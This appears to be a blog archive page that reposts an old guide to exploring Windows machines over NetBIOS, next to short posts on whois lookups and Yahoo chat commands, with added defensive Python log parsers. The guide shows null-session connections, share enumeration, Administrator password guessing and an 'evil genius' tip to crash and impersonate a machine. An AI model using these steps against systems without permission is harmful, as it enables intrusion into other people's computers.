Wednesday, July 29, 2009

telnet trick port 25

Network Solutions shut down that nifty telnet thing on whois.internic.net on the default telnet port (25), despite many protests. However, there is still something fun you can do with telnet and whois.internic.net or any other cooperating domain name server. At your DOS prompt in Windows (search for command.com or cmd.exe to run a DOS prompt) or terminal prompt (shell) in Linux or Unix, type:
telnet whois.internic.net 43
It gives a blank page. Type in the domain name you want to check and hit enter. Voila! You get something like this:
Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net for detailed information.
Domain Name: TECHBROKER.COM
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com
Name Server: DNS1.WURLD.NET
Name Server: DNS2.WURLD.NET
Status: ACTIVE
Updated Date: 11-dec-2002
Creation Date: 13-feb-1996
Expiration Date: 14-feb-2006
>>> Last update of whois database: Fri, 14 Nov 2003 07:28:09 EST <<<
NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.
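The same port-43 exchange, as an added Python example that is not part of the original post: whois_query() does what the telnet session above does by hand (connect to TCP 43, send the name followed by CRLF, read until the server closes), and parse_whois_record() pulls the fields out of the reply. The sample reply embedded below is constructed from the TECHBROKER.COM record above so the parser runs offline; the function and field names are this example's own.

```python
import datetime
import re
import socket

# Sample reply constructed from the TECHBROKER.COM record shown above
# (the long NOTICE paragraph is abbreviated); used so the parser runs offline.
SAMPLE_WHOIS_RESPONSE = """\
Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net for detailed information.

   Domain Name: TECHBROKER.COM
   Registrar: NETWORK SOLUTIONS, INC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com
   Name Server: DNS1.WURLD.NET
   Name Server: DNS2.WURLD.NET
   Status: ACTIVE
   Updated Date: 11-dec-2002
   Creation Date: 13-feb-1996
   Expiration Date: 14-feb-2006

>>> Last update of whois database: Fri, 14 Nov 2003 07:28:09 EST <<<

NOTICE: The expiration date displayed in this record is the date the registrar's
sponsorship of the domain name registration in the registry is currently set to expire.
"""

# A record line is "Key: value" with a space after the colon; requiring that
# space keeps the "http://..." inside the boilerplate sentence from being
# read as a field.
FIELD = re.compile(r"^([A-Za-z][A-Za-z ]*?): (.+)$")


def whois_query(domain, server="whois.internic.net", port=43, timeout=10):
    """Do what the telnet session does by hand: open TCP 43, send the query
    terminated by CRLF (the whois protocol, RFC 3912), and read until the
    server closes the connection. Not called by the offline demo below."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(domain.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois_record(text):
    """Collect the 'Key: value' fields of a registry reply into a dict.
    Keys that repeat (Name Server) become lists; the NOTICE boilerplate
    and the '>>> Last update' line are skipped."""
    record = {}
    for raw in text.splitlines():
        match = FIELD.match(raw.strip())
        if not match or match.group(1) == "NOTICE":
            continue
        key, value = match.group(1), match.group(2).strip()
        if key in record:
            if not isinstance(record[key], list):
                record[key] = [record[key]]
            record[key].append(value)
        else:
            record[key] = value
    return record


def expiration_date(record):
    """Turn the registry's 'dd-mon-yyyy' expiration string into a date, so an
    inventory script can flag domains about to lapse (or already lapsed)."""
    return datetime.datetime.strptime(record["Expiration Date"], "%d-%b-%Y").date()


def registrar_whois_server(record):
    """The registry reply only points at the sponsoring registrar; this is the
    server to query next (same port 43) for the registrant details."""
    return record.get("Whois Server")


if __name__ == "__main__":
    rec = parse_whois_record(SAMPLE_WHOIS_RESPONSE)
    print(rec["Domain Name"], "expires", expiration_date(rec),
          "registrar whois:", registrar_whois_server(rec))
```

The registry record is only the first hop: the "Whois Server:" field names the registrar server to query next, which is where the registrant contact data lives.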

Yahoo Chat Commands how to

Yahoo Chat Commands:

/join [room] go to whatever room you wish

/invite [buddy's name] sends invitation request

/tell [user] [message] private messages a friend

/follow [user] follows a friend

/stopfollow [user] stop following someone

/stopfollow [yourname] to stop them from following you

/goto [user] enters the room the user is in

/away [off] turn your private messages back on

/think [message] (type this to "think" what you want)

/ignore [list] list everyone who you are ignoring

/ignore add [user] add someone to your ignoring list

/ignore [add all] ignores everything going on

NetBios explained

The Magic of NetBIOS
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
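An added Python example (not from the original guide) that applies the reasoning above to firewall alerts: it parses the Zone Alarm-style lines quoted here and sorts each into a LAN neighbour, an outside NetBIOS probe, an unattributable source, or outbound NetBIOS traffic. The sample alerts, the 10.0.0.0/24 LAN range and the 203.0.113.77 address are constructed for the demonstration.

```python
import ipaddress
import re
from collections import Counter

# Sample alerts constructed for this example, modelled on the Zone Alarm
# messages quoted above (the 999.x address is the altered one from the text).
SAMPLE_ALERTS = [
    "The firewall has blocked Internet access to your computer (NetBIOS Session) "
    "from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].",
    "The firewall has blocked Internet access to your computer (NetBIOS Name) "
    "from 999.209.116.123 (UDP Port 1028).",
    "The firewall has blocked Internet access to your computer (NetBIOS Name) "
    "from 203.0.113.77 (UDP Port 137).",
    "The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) "
    "from your computer [TCP Flags: S].",
]

# Ports NetBIOS over TCP/IP and SMB use: 137/138 name and datagram services,
# 139 session service, 445 direct-hosted SMB.
NETBIOS_PORTS = {137, 138, 139, 445}

INBOUND = re.compile(
    r"blocked Internet access to your computer \((?P<service>[^)]+)\) "
    r"from (?P<src>\S+) \((?P<proto>TCP|UDP) Port (?P<port>\d+)\)"
)
OUTBOUND = re.compile(
    r"blocked Internet access to (?P<dst>\S+) "
    r"\((?P<proto>TCP|UDP) Port (?P<port>\d+)\) from your computer"
)


def parse_alert(line):
    """Return a dict describing one alert line, or None if it is not one."""
    match = INBOUND.search(line)
    if match:
        return {"direction": "inbound", **match.groupdict()}
    match = OUTBOUND.search(line)
    if match:
        return {"direction": "outbound", "service": None, **match.groupdict()}
    return None


def classify(alert, lan_network=ipaddress.ip_network("10.0.0.0/24")):
    """Apply the reasoning from the text: NetBIOS traffic from a LAN address is
    most likely a neighbour (the text warns the address could be spoofed, so
    it still deserves a look), anything else inbound is an outside probe, and
    a source that is not a valid address cannot be attributed at all."""
    if alert["direction"] == "outbound":
        return "outbound-netbios" if int(alert["port"]) in NETBIOS_PORTS else "outbound-other"
    if not alert["service"].startswith("NetBIOS"):
        return "inbound-other"
    try:
        src = ipaddress.ip_address(alert["src"])
    except ValueError:
        return "malformed-source"
    return "lan-peer" if src in lan_network else "external-probe"


def triage(lines, lan_network=ipaddress.ip_network("10.0.0.0/24")):
    """Count verdicts over a batch of log lines; non-alert lines are ignored."""
    verdicts = Counter()
    for line in lines:
        alert = parse_alert(line)
        if alert is not None:
            verdicts[classify(alert, lan_network)] += 1
    return verdicts


if __name__ == "__main__":
    for line in SAMPLE_ALERTS:
        print(classify(parse_alert(line)), "<-", line)
    print(dict(triage(SAMPLE_ALERTS)))
```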
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are files and directories on your computer that you have made accessible to other computers. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that work only over NetBIOS. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    OLDGUY         <00>  UNIQUE      Registered
    OLDGUY         <20>  UNIQUE      Registered
    WARGAME        <00>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~OLDGUY......<00>  UNIQUE      Registered
    OLDGUY         <03>  UNIQUE      Registered
    WARGAME        <1E>  GROUP       Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name                 Number  Type  Usage
=========================================================
<computername>       00      U     Workstation Service
<computername>       01      U     Messenger Service
<\\_MSBROWSE_>       01      G     Master Browser
<computername>       03      U     Messenger Service
<computername>       06      U     RAS Server Service
<computername>       1F      U     NetDDE Service
<computername>       20      U     File Server Service
<computername>       21      U     RAS Client Service
<computername>       22      U     Exchange Interchange
<computername>       23      U     Exchange Store
<computername>       24      U     Exchange Directory
<computername>       30      U     Modem Sharing Server Service
<computername>       31      U     Modem Sharing Client Service
<computername>       43      U     SMS Client Remote Control
<computername>       44      U     SMS Admin Remote Control Tool
<computername>       45      U     SMS Client Remote Chat
<computername>       46      U     SMS Client Remote Transfer
<computername>       4C      U     DEC Pathworks TCPIP Service
<computername>       52      U     DEC Pathworks TCPIP Service
<computername>       87      U     Exchange MTA
<computername>       6A      U     Exchange IMC
<computername>       BE      U     Network Monitor Agent
<computername>       BF      U     Network Monitor Apps
<username>           03      U     Messenger Service
<domain>             00      G     Domain Name
<domain>             1B      U     Domain Master Browser
<domain>             1C      G     Domain Controllers
<domain>             1D      U     Master Browser
<domain>             1E      G     Browser Service Elections
<INet~Services>      1C      G     Internet Information Server
<IS~computer name>   00      U     Internet Information Server
To keep this Guide from being ridiculously long, we'll just explain a few of the things we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp (file transfer protocol) server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
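The decoding just walked through, as an added Python example rather than anything from the original guide: it parses an nbtstat -a listing, looks each <suffix>/type pair up in the table above, and produces the same findings (computer name, domain, user names, file server, IIS, MAC). The listing embedded below is constructed from the Oldguy output above; the function names are this example's own.

```python
import re

# Listing constructed from the "nbtstat -a 10.0.0.2" output shown above.
SAMPLE_NBTSTAT = """\
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    OLDGUY         <00>  UNIQUE      Registered
    OLDGUY         <20>  UNIQUE      Registered
    WARGAME        <00>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~OLDGUY......<00>  UNIQUE      Registered
    OLDGUY         <03>  UNIQUE      Registered
    WARGAME        <1E>  GROUP       Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 52-54-00-E4-6F-40
"""

# Suffix meanings taken from the Rhino9 table above (only the rows a listing
# like this can produce are needed); the key is (suffix, UNIQUE/GROUP).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain Name",
    ("01", "GROUP"): "Master Browser",
    ("03", "UNIQUE"): "Messenger Service",
    ("06", "UNIQUE"): "RAS Server Service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("20", "UNIQUE"): "File Server Service",
    ("21", "UNIQUE"): "RAS Client Service",
}

# Name, padding dots (nbtstat pads short names with '.'), <suffix>, type, status.
ENTRY = re.compile(
    r"^\s*(?P<name>\S.*?)\.*\s*<(?P<suffix>[0-9A-F]{2})>\s+(?P<type>UNIQUE|GROUP)\s+(?P<status>\w+)"
)
MAC = re.compile(r"MAC Address\s*=\s*(?P<mac>(?:[0-9A-Fa-f]{2}-){5}[0-9A-Fa-f]{2})")


def parse_nbtstat(text):
    """Return one dict per name-table row, in listing order."""
    return [m.groupdict() for m in (ENTRY.match(line) for line in text.splitlines()) if m]


def describe(entry):
    """What a row advertises. The 1C group and 00 unique suffixes mean IIS when
    the name is INet~Services or starts with IS~, domain/workstation otherwise."""
    name, suffix, kind = entry["name"], entry["suffix"], entry["type"]
    if (name == "INet~Services" and suffix == "1C") or (name.startswith("IS~") and suffix == "00"):
        return "Internet Information Server"
    return SUFFIX_MEANING.get((suffix, kind), "unknown (%s %s)" % (suffix, kind))


def summarize(text):
    """Reproduce the findings listed in the text from a raw listing."""
    entries = parse_nbtstat(text)
    computer = next((e["name"] for e in entries
                     if e["suffix"] == "00" and e["type"] == "UNIQUE"
                     and not e["name"].startswith("IS~")), None)
    domain = next((e["name"] for e in entries
                   if e["suffix"] == "00" and e["type"] == "GROUP"), None)
    # A <03> unique name that is not the machine's own name is a logged-on user.
    users = sorted({e["name"] for e in entries
                    if e["suffix"] == "03" and e["type"] == "UNIQUE" and e["name"] != computer})
    mac = MAC.search(text)
    return {
        "computer": computer,
        "domain": domain,
        "users": users,
        "file_server": any(describe(e) == "File Server Service" for e in entries),
        "iis": any(describe(e) == "Internet Information Server" for e in entries),
        "mac": mac.group("mac") if mac else None,
    }


if __name__ == "__main__":
    for e in parse_nbtstat(SAMPLE_NBTSTAT):
        print("%-15s <%s> %-6s %s" % (e["name"], e["suffix"], e["type"], describe(e)))
    print(summarize(SAMPLE_NBTSTAT))
```

Run over your own hosts' listings, this shows exactly what each machine is advertising to anyone who can reach UDP 137, which is the inventory a defender wants before deciding whether NetBIOS should be enabled at all.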
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in."
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once you Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the message:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."

More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET COMPUTER
• NET CONFIG
• NET CONFIG SERVER
• NET CONFIG WORKSTATION
• NET CONTINUE
• NET FILE
• NET GROUP
• NET HELP
• NET HELPMSG
• NET LOCALGROUP
• NET NAME
• NET PAUSE
• NET PRINT
• NET SEND
• NET SESSION
• NET SHARE
• NET START
• NET STATISTICS
• NET STOP
• NET TIME
• NET USE
• NET USER
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at . There is also a Windows version of nmap, but it isn't very good. A better choice for Windows is Whats Up from . You can get a one month free trial of it.
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml .
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see .
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.

How to use the Web to look up information on hacking

____________________________________________________________
Want to become really, really unpopular? Try asking your hacker friends too many questions of the wrong sort.
But, but, how do we know what are the wrong questions to ask? OK, I sympathize with your problems because I get flamed a lot, too. That's partly because I sincerely believe in asking dumb questions. I make my living asking dumb questions. People pay me lots of money to go to conferences, call people on the phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them. And, guess what, sometimes the dumbest questions get you the best answers. So that's why you don't see me flaming people who ask dumb questions.
********************************************************
Newbie note: Have you been too afraid to ask the dumb question, "What is a flame?" Now you get to find out! It is a bunch of obnoxious rantings and ravings made in email or a Usenet post by some idiot who thinks he or she is proving his or her mental superiority through use of foul and/or impolite language such as "you suffer from rectocranial inversion," f*** y***, d****, b****, and of course @#$%^&*! This newbie note is my flame against those flamers to whom I am soooo superior.
********************************************************
But even though dumb questions can be good to ask, you may not like the flames they bring down on you. So, if you want to avoid flames, how do you find out answers for yourself?
This Guide covers one way to find out hacking information without having to ask people questions: by surfing the Web. The other way is to buy lots and lots of computer manuals, but that costs a lot of money. Also, in some parts of the world it is difficult to get manuals. Fortunately, however, almost anything you want to learn about computers and communications is available for free somewhere on the Web.
First, let's consider the Web search engines. Some just help you search the Web itself. But others enable you to search Usenet newsgroups that have been archived for many years back. Also, the best hacker email lists are archived on the Web, as well.
There are two major considerations in using Web search engines. One is what search engine to use, and the other is the search tactics themselves.
I have used many Web search engines. But eventually I came to the conclusion that for serious research, you only need two: Altavista () and Dejanews (). Altavista is the best for the Web, while Dejanews is the best one for searching Usenet news groups. But, if you don't want to take me at my word, you may surf over to a site with links to almost all the Web and Newsgroup search engines at .
But just how do you efficiently use these search engines? If you ask them to find "hacker" or even "how to hack," you will get bazillions of Web sites and news group posts to read. OK, so you painfully surf through one hacker Web site after another. You get portentous-sounding organ music, skulls with red rolling eyes, animated fires burning, and each site has links to other sites with pretentious music and ungrammatical boastings about "I am 31337, d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my $%^&&*!" But somehow they don't seem to have any actual information. Hey, welcome to the wannabe hacker world!
You need to figure out some words that help the search engine of your choice get more useful results. For example, let's say you want to find out whether I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or merely some poser. Now the luser approach would be to simply go to http://www.dejanews.com and do a search of Usenet news groups for "Carolyn Meinel," being sure to click the "old" button to bring up stuff from years back. But if you do that, you get this huge long list of posts, most of which have nothing to do with hacking:
